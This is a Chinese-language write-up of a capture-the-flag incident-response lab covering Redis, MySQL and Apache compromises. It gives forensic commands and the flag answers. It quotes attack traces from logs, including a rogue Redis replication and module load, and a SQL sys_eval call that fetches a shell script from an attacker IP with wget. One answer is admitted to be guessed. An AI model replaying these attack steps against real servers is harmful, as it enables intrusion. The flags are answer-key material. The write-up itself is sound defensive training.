玄机应急响应第二章
redis应急响应
通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;
查看/var/log/redis.log
找到
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from ‘id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof’)
flag{192.168.100.20}
通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;
发现存在一行
419:S 31 Jul 2023 05:34:37.205 * Module ‘system’ loaded from ./exp.so
并在根目录找到这个exp.so
root@ip-10-0-10-3:~# strings /exp.so |grep "flag" |
通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;
按理来说应该是crontab -l 看出来的,但是环境有些问题,答案事猜出来的()
flag{192.168.100.13}
通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交
root@ip-10-0-10-1:~# cat /root/.ssh/authorized_keys |
这里考察溯源,找到他的github账号
https://github.com/xj-test-user/redis-rogue-getshell
在三次历史commit中找到
https://github.com/xj-test-user/redis-rogue-getshell/commit/76b1b74b92f9cc6ef2a62985debdf09dcc056636
flag{xj-test-user-wow-you-find-flag}
通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;
root@ip-10-0-10-1:~# cat /usr/bin/ps |
flag{c195i2923381905517d818e313792d196}
mysql应急响应
1.黑客第一次写入的shell flag{关键字符串}
依旧先下载web目录,使用D盾,找到webshell是sh.php
flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}
2.黑客反弹shell的ip flag{ip}
找到一个远程下载sh脚本
HTTP/1.1" 200 3875 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" |
root@xuanji:~# cat /tmp/1.sh |
flag{192.168.100.13}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
mysql提权一般使用udf
root@xuanji:~# cat /var/log/apache2/access.log |grep ".so" |
root@xuanji:~# find / -name mysqludf.so 2>/dev/null |
结果发现答案竟然不是
root@xuanji:~# ls -liah /usr/lib/mysql/plugin/ |
是/usr/lib/mysql/plugin/udf.so,是一个一句话木马
flag{b1818bde4e310f3d23f1005185b973e7}
4.黑客获取的权限 flag{whoami后的值}
ps aux发现mysql运行的用户身份是mysql
flag{mysql}
apache日志分析
1、提交当天访问次数最多的IP,即黑客IP:
root@ip-10-0-10-3:~# cat /var/log/apache2/access.log.1 |awk '{print $1}' |sort|uniq -c |
flag{192.168.200.2}
2、黑客使用的浏览器指纹是什么,提交指纹的md5:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
flag{2d6330f380f44ac20f3a02eed0958f66}
3、查看index.php页面被访问的次数,提交次数:
root@ip-10-0-10-3:~# cat /var/log/apache2/access.log.1 |grep "/index.php" |wc -l |
flag{27}
4、查看黑客IP访问了多少次,提交次数:
flag{6555}
5、查看2023年8月03日8时这一个小时内有多少IP访问,提交次数:
::1表示本地IPv6的主机IP
root@ip-10-0-10-3:~# cat /var/log/apache2/access.log.1 |grep "03/Aug/2023:08" |awk '{print $1}' |sort|uniq -c |
flag{5}